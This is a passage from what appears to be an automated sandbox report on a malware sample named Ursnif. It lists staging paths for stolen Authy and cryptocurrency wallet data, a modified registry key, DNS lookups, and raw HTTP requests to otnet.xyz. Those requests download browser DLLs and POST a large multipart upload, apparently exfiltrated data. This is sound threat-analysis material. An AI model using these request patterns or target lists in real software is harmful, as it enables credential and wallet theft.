  644.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Soft\\Authy",
  645.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Soft",
  646.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Anoncoin",
  647.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\BBQCoin",
  648.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Bitcoin",
  649.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DashCore",
  650.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DevCoin",
  651.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DigitalCoin",
  652.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\ElectronCash",
  653.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Electrum",
  654.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\ElectrumLTC",
  655.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Ethereum",
  656.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Exodus",
  657.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\FlorinCoin",
  658.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Franko",
  659.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\FreiCoin",
  660.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\GoldCoinGLD",
  661.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\InfiniteCoin",
  662.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\IOCoin",
  663.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\IxCoin",
  664.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\JAXX",
  665.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Litecoin",
  666.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MegaCoin",
  667.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MinCoin",
  668.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MultiDoge",
  669.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\NameCoin",
  670.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\PrimeCoin",
  671.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\TerraCoin",
  672.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\YACoin",
  673.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Zcash",
  674.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets",
  675.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\CA_00000000-0000-0000-0000-0000000000004771908667.zip",
  676.     "C:\\Users\\user\\AppData\\Local\\Temp\\Ursnif_a85132af1b5651472eb4ad093e1bb0f5.exe"
  677.  
  678.  
  679. * Modified Registry Keys:
  680.     "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Type"
  681.  
  682.  
  683. * Deleted Registry Keys:
  684.  
  685. * DNS Communications:
  686.    
  687.         "type": "A",
  688.         "request": "otnet.xyz",
  689.         "answers":
  690.            
  691.                 "data": "209.141.47.33",
  692.                 "type": "A"
  693.            
  694.        
  695.    
  696.    
  697.         "type": "A",
  698.         "request": "ip-api.com",
  699.         "answers":
  700.            
  701.                 "data": "72.11.140.50",
  702.                 "type": "A"
  703.            
  704.            
  705.                 "data": "66.212.29.250",
  706.                 "type": "A"
  707.            
  708.        
  709.    
  710.  
  711.  
  712. * Domains:
  713.    
  714.         "ip": "209.141.47.33",
  715.         "domain": "otnet.xyz"
  716.    
  717.    
  718.         "ip": "72.11.140.50",
  719.         "domain": "ip-api.com"
  720.    
  721.  
  722.  
  723. * Network Communication - ICMP:
  724.  
  725. * Network Communication - HTTP:
  726.    
  727.         "count": 1,
  728.         "body": "--1BEF0A57BE110FD467A--\r\n",
  729.         "uri": "http://otnet.xyz/141",
  730.         "user-agent": "",
  731.         "method": "POST",
  732.         "host": "otnet.xyz",
  733.         "version": "1.1",
  734.         "path": "/141",
  735.         "data": "POST /141 HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 25\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--1BEF0A57BE110FD467A--\r\n",
  736.         "port": 80
  737.    
  738.    
  739.         "count": 1,
  740.         "body": "",
  741.         "uri": "http://otnet.xyz/freebl3.dll",
  742.         "user-agent": "",
  743.         "method": "GET",
  744.         "host": "otnet.xyz",
  745.         "version": "1.1",
  746.         "path": "/freebl3.dll",
  747.         "data": "GET /freebl3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\n\r\n",
  748.         "port": 80
  749.    
  750.    
  751.         "count": 1,
  752.         "body": "",
  753.         "uri": "http://otnet.xyz/freebl3.dll?ddosprotected=1",
  754.         "user-agent": "",
  755.         "method": "GET",
  756.         "host": "otnet.xyz",
  757.         "version": "1.1",
  758.         "path": "/freebl3.dll?ddosprotected=1",
  759.         "data": "GET /freebl3.dll?ddosprotected=1 HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  760.         "port": 80
  761.    
  762.    
  763.         "count": 1,
  764.         "body": "",
  765.         "uri": "http://otnet.xyz/mozglue.dll",
  766.         "user-agent": "",
  767.         "method": "GET",
  768.         "host": "otnet.xyz",
  769.         "version": "1.1",
  770.         "path": "/mozglue.dll",
  771.         "data": "GET /mozglue.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  772.         "port": 80
  773.    
  774.    
  775.         "count": 1,
  776.         "body": "",
  777.         "uri": "http://otnet.xyz/msvcp140.dll",
  778.         "user-agent": "",
  779.         "method": "GET",
  780.         "host": "otnet.xyz",
  781.         "version": "1.1",
  782.         "path": "/msvcp140.dll",
  783.         "data": "GET /msvcp140.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  784.         "port": 80
  785.    
  786.    
  787.         "count": 1,
  788.         "body": "",
  789.         "uri": "http://otnet.xyz/nss3.dll",
  790.         "user-agent": "",
  791.         "method": "GET",
  792.         "host": "otnet.xyz",
  793.         "version": "1.1",
  794.         "path": "/nss3.dll",
  795.         "data": "GET /nss3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  796.         "port": 80
  797.    
  798.    
  799.         "count": 1,
  800.         "body": "",
  801.         "uri": "http://otnet.xyz/softokn3.dll",
  802.         "user-agent": "",
  803.         "method": "GET",
  804.         "host": "otnet.xyz",
  805.         "version": "1.1",
  806.         "path": "/softokn3.dll",
  807.         "data": "GET /softokn3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  808.         "port": 80
  809.    
  810.    
  811.         "count": 1,
  812.         "body": "",
  813.         "uri": "http://otnet.xyz/vcruntime140.dll",
  814.         "user-agent": "",
  815.         "method": "GET",
  816.         "host": "otnet.xyz",
  817.         "version": "1.1",
  818.         "path": "/vcruntime140.dll",
  819.         "data": "GET /vcruntime140.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  820.         "port": 80
  821.    
  822.    
  823.         "count": 1,
  824.         "body": "--1BEF0A57BE110FD467A--\r\n",
  825.         "uri": "http://ip-api.com/line/",
  826.         "user-agent": "",
  827.         "method": "POST",
  828.         "host": "ip-api.com",
  829.         "version": "1.1",
  830.         "path": "/line/",
  831.         "data": "POST /line/ HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 25\r\nHost: ip-api.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--1BEF0A57BE110FD467A--\r\n",
  832.         "port": 80
  833.    
  834.    
  835.         "count": 1,
  836.         "body": "",
  837.         "uri": "http://otnet.xyz/",
  838.         "user-agent": "",
  839.         "method": "POST",
  840.         "host": "otnet.xyz",
  841.         "version": "1.1",
  842.         "path": "/",
  843.         "data": "POST / HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 40736\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  844.         "port": 80
  845.    
  846.  
  847.  
  848. * Network Communication - SMTP:
  849.  
  850. * Network Communication - Hosts:
  851.  
  852. * Network Communication - IRC: